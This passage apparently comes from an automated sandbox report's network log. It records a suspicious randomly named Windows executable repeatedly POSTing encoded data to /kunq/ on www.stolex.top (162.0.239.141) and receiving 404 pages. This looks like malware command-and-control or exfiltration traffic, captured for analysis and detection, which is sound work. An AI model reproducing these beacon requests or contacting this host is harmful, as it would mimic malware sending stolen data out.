                                        29192.168.2.651226162.0.239.141805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:43.448261976 CEST825OUTPOST /kunq/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.stolex.top
                                        Origin: http://www.stolex.top
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.stolex.top/kunq/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 54 30 42 68 43 36 4b 30 6a 67 59 73 65 64 73 68 61 56 6d 4f 4c 77 30 50 4d 49 6f 41 74 76 31 70 6c 77 79 41 77 71 30 76 78 6e 72 6b 79 72 6c 73 68 37 43 73 6d 77 2f 2f 48 6f 49 65 50 6c 32 67 74 58 70 31 62 61 53 56 77 47 4b 70 6b 37 6e 47 31 30 70 2f 56 79 62 49 4c 68 54 2b 41 69 4e 71 78 72 2b 6b 31 5a 59 32 76 4b 46 65 4d 44 58 53 79 47 34 6e 64 50 37 53 30 6d 43 47 65 35 30 64 6a 54 44 64 4a 61 37 73 6d 54 75 7a 5a 6b 4b 46 69 4d 71 7a 61 6b 4c 6e 73 4b 72 48 45 71 46 68 45 59 77 61 38 77 69 54 4b 66 4d 31 59 59 52 53 6f 2f 33 46 31 44 75 4e 62 4a 75 6d 65 44 73 53 31 42 70 34 4e 66 62 44 7a 63 77 48
                                        Data Ascii: mvjDMBx8=T0BhC6K0jgYsedshaVmOLw0PMIoAtv1plwyAwq0vxnrkyrlsh7Csmw//HoIePl2gtXp1baSVwGKpk7nG10p/VybILhT+AiNqxr+k1ZY2vKFeMDXSyG4ndP7S0mCGe50djTDdJa7smTuzZkKFiMqzakLnsKrHEqFhEYwa8wiTKfM1YYRSo/3F1DuNbJumeDsS1Bp4NfbDzcwH
                                        Aug 27, 2024 08:43:44.030395031 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:43:43 GMT
                                        Server: Apache
                                        Content-Length: 18121
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                                        Aug 27, 2024 08:43:44.030441046 CEST1236INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                                        Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                                        Aug 27, 2024 08:43:44.030457020 CEST1236INData Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                                        Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                                        Aug 27, 2024 08:43:44.030468941 CEST1236INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 32 39 2e 38
                                        Data Ascii: ath class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                                        Aug 27, 2024 08:43:44.030484915 CEST896INData Raw: 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 36 30 20 32 38 32 2e 34 68 2d 33 6c 2d
                                        Data Ascii: ss="st2" d="M870 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M860 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M850 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M840 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M830 282.4h
                                        Aug 27, 2024 08:43:44.030498981 CEST1236INData Raw: 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20
                                        Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M700 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M690 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M680 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M670 282.4h-3l-6.8 25.2h3z"
                                        Aug 27, 2024 08:43:44.030510902 CEST1236INData Raw: 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 32 30 2e 32 20 32 38 32 2e
                                        Data Ascii: ="st2" d="M-430.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-420.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-410.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-400.2 282.4h-3l-6.8 25.2h3z"/> <path class="s
                                        Aug 27, 2024 08:43:44.030519009 CEST448INData Raw: 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 32 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61
                                        Data Ascii: h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-200.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-190.2 282.4h-3l-6.8 25.2h3z
                                        Aug 27, 2024 08:43:44.036318064 CEST1236INData Raw: 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 34 30 2e 32 20 32 38 32 2e 34 68 2d 33
                                        Data Ascii: 2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                                        Aug 27, 2024 08:43:44.036379099 CEST1236INData Raw: 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                                        Data Ascii: d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M410 282.4h-
                                        Aug 27, 2024 08:43:44.036401033 CEST1236INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 32 30
                                        Data Ascii: <path class="st2" d="M230 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M220 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M210 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M200 282.4h-3l-6.8 25.2h3z"/> <path class="st


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        30192.168.2.651227162.0.239.141805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:45.987236977 CEST849OUTPOST /kunq/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.stolex.top
                                        Origin: http://www.stolex.top
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.stolex.top/kunq/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 54 30 42 68 43 36 4b 30 6a 67 59 73 65 38 63 68 62 79 79 4f 4e 51 30 4d 51 34 6f 41 30 2f 31 74 6c 77 2b 41 77 72 78 6b 79 56 2f 6b 31 4f 5a 73 67 36 43 73 6f 51 2f 2f 66 34 4a 57 41 46 32 33 74 58 31 4c 62 66 71 56 77 47 75 70 6b 36 58 47 31 46 70 67 55 69 62 4b 54 52 54 38 50 43 4e 71 78 72 2b 6b 31 64 34 63 76 4f 70 65 4d 77 50 53 78 6e 34 6d 56 76 37 64 39 47 43 47 49 4a 30 5a 6a 54 44 7a 4a 61 4c 57 6d 52 57 7a 5a 67 4f 46 69 59 2b 77 4e 30 4c 6c 6f 4b 71 4e 48 35 30 44 41 71 31 61 79 6a 61 48 4c 2f 41 30 51 4f 51 49 30 4d 33 6d 6e 54 4f 50 62 4c 32 55 65 6a 73 34 33 42 52 34 66 49 58 6b 38 6f 56 6b 2f 51 48 37 72 75 61 54 31 49 6a 2f 4b 75 73 49 4b 44 45 48 35 67 3d 3d
                                        Data Ascii: mvjDMBx8=T0BhC6K0jgYse8chbyyONQ0MQ4oA0/1tlw+AwrxkyV/k1OZsg6CsoQ//f4JWAF23tX1LbfqVwGupk6XG1FpgUibKTRT8PCNqxr+k1d4cvOpeMwPSxn4mVv7d9GCGIJ0ZjTDzJaLWmRWzZgOFiY+wN0LloKqNH50DAq1ayjaHL/A0QOQI0M3mnTOPbL2Uejs43BR4fIXk8oVk/QH7ruaT1Ij/KusIKDEH5g==
                                        Aug 27, 2024 08:43:46.567090034 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:43:46 GMT
                                        Server: Apache
                                        Content-Length: 18121
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                                        Aug 27, 2024 08:43:46.567107916 CEST1236INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                                        Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                                        Aug 27, 2024 08:43:46.567143917 CEST448INData Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                                        Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                                        Aug 27, 2024 08:43:46.567163944 CEST1236INData Raw: 22 73 74 32 22 20 64 3d 22 4d 32 37 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 38 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c
                                        Data Ascii: "st2" d="M279.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M289.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M299.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M309.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M319.8
                                        Aug 27, 2024 08:43:46.567177057 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64
                                        Data Ascii: > <path class="st2" d="M499.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M1000 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M990 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M980 282.4h-3l-6.8 25.2h3z"/> <path class="s
                                        Aug 27, 2024 08:43:46.567188978 CEST1236INData Raw: 20 64 3d 22 4d 37 39 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 38 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32
                                        Data Ascii: d="M790 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M780 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M770 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M760 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M750 282.4h-3l-6.8
                                        Aug 27, 2024 08:43:46.567203045 CEST1236INData Raw: 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 35 36 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 3c 70 61 74 68
                                        Data Ascii: 2h3z"/> <path class="st2" d="M560 282.4h-3l-6.8 25.2h3z"/> <g> <path class="st2" d="M-490.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-480.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-470.2 282.4h-3l-6.8 25.
                                        Aug 27, 2024 08:43:46.567215919 CEST896INData Raw: 3d 22 4d 2d 33 30 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e
                                        Data Ascii: ="M-300.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-290.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-280.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-270.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M
                                        Aug 27, 2024 08:43:46.567233086 CEST1236INData Raw: 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 34 30 2e 32 20 32 38 32 2e 34 68 2d 33
                                        Data Ascii: 2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                                        Aug 27, 2024 08:43:46.567243099 CEST224INData Raw: 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                                        Data Ascii: d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="s
                                        Aug 27, 2024 08:43:46.572103024 CEST1236INData Raw: 74 32 22 20 64 3d 22 4d 34 31 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38
                                        Data Ascii: t2" d="M410 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M400 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M390 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M380 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M370 282


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        31192.168.2.651228162.0.239.141805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:48.539870024 CEST1862OUTPOST /kunq/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.stolex.top
                                        Origin: http://www.stolex.top
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.stolex.top/kunq/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 54 30 42 68 43 36 4b 30 6a 67 59 73 65 38 63 68 62 79 79 4f 4e 51 30 4d 51 34 6f 41 30 2f 31 74 6c 77 2b 41 77 72 78 6b 79 56 48 6b 79 37 56 73 68 5a 71 73 70 51 2f 2f 42 6f 4a 56 41 46 32 50 74 58 39 58 62 66 75 46 77 45 6d 70 31 6f 7a 47 7a 33 42 67 61 69 62 4b 50 68 54 35 41 69 4e 2f 78 72 75 6f 31 5a 63 63 76 4f 70 65 4d 79 37 53 6c 47 34 6d 59 50 37 53 30 6d 43 43 65 35 30 39 6a 54 72 46 4a 62 2f 47 6d 41 32 7a 5a 41 65 46 6a 75 43 77 4f 55 4c 6a 6c 71 72 59 48 35 34 31 41 72 5a 38 79 69 75 68 4c 34 49 30 61 49 4e 53 77 66 37 74 35 69 6d 56 48 70 79 71 64 7a 31 50 32 33 4a 35 58 75 44 54 7a 62 56 72 77 6e 50 74 39 6f 6d 56 37 6f 6a 34 42 37 56 39 50 69 39 53 71 6e 59 65 39 66 30 57 67 73 30 69 54 72 44 6a 63 76 4f 57 6d 65 38 30 30 4e 69 39 79 57 79 73 78 47 38 5a 35 53 75 35 63 53 61 67 42 55 46 50 68 32 6e 7a 55 50 55 66 67 42 63 41 49 65 65 47 6a 5a 4e 70 36 68 46 4b 44 74 57 2f 2f 55 33 6f 64 64 32 47 79 41 67 46 6b 4f 51 63 46 2f 53 41 4a 78 47 63 46 5a 54 35 53 [TRUNCATED]
